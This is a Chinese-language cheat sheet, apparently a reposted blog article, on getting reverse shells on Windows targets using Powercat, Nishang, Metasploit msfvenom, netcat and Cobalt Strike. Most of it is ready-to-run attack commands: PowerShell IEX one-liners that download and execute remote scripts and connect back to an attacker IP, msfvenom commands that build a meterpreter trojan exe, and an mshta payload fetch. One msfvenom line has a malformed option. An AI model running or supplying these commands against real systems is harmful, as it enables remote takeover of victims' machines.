admin 管理员组文章数量: 887019
目录
- 一、Powercat反弹shell
- 二、Nishang反弹shell
- 三、UDP反弹shell
- 四、Metasploit反弹shell
- 五、nc反弹
- 六、CS反弹
一、Powercat反弹shell
powercat下载: powercat.
powercat 是一个 函数。首先,需要先加载该函数,然后才能执行它。加载方式有两种:
其一:下载powercat.ps1至本地,并加载
其二:从URL加载
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.8.14/powercat.ps1')
攻击者开启监听
目标机cmd下执行反弹shell
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.8.14/powercat.ps1');powercat -c 192.168.110.128 -p 6677 -e cmd
攻击机查看反弹shell情况,反弹成功
二、Nishang反弹shell
Nishang下载: Nishang.
Nishang 是一个脚本和有效载荷的框架和集合,它支持使用 PowerShell 进行攻击性安全、渗透测试和红队。Nishang 在渗透测试的所有阶段都很有用。
攻击者开启监听
目标机cmd下执行反弹shell(Invoke-PowerShellTcp.ps1函数取至于/nishang-master/Shells目录下)
powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.8.14/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.110.128 -port 6666
攻击机上查看反弹情况,反弹成功
三、UDP反弹shell
利用方法同第二部分,利用/nishang/shells文件夹中的Invoke-PowerShellUdp.ps1文件
攻击机开启监听
nc -lvup 6677
目标机执行反弹shell
powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.8.14/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress 192.168.110.128 -port 6677
攻击机查看反弹成功
四、Metasploit反弹shell
方法一:
利用msfvenom制作.exe格式的反弹shell木马文件
msfvenom -p windows/meterpreter/reverse_tcp -l lhost=192.168.110.128 -p lport= 6677 -f exe -o 716.exe
攻击机开启监听
目标机上传716.exe,并执行
攻击机查看已建立连接
方法二:
使用 msfvenom -l 结合关键字过滤(如cmd/windows/reverse),找出我们需要的各类反弹一句话payload的路径信息。
msfvenom -l payload | grep 'cmd/windows/reverse'
使用如下的命令生成反弹一句话,然后复制粘贴到靶机上运行即可。
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.110.128 lport=4444
攻击机开启监听
目标机cmd下执行反弹shell
查看攻击机反弹成功
五、nc反弹
攻击机开启监听
目标机执行反弹shell
攻击机查看反弹成功
六、CS反弹
攻击机开启监听
生成payload, Attacks---->Packages---->HTML Application
设置Host File
目的靶机上执行mshta http://192.168.8.137:80/download/file.ext
攻击机CS上查看建立连接
版权声明:本文标题:Windows系统反弹shell常见方法总结 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1727966181h1181523.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论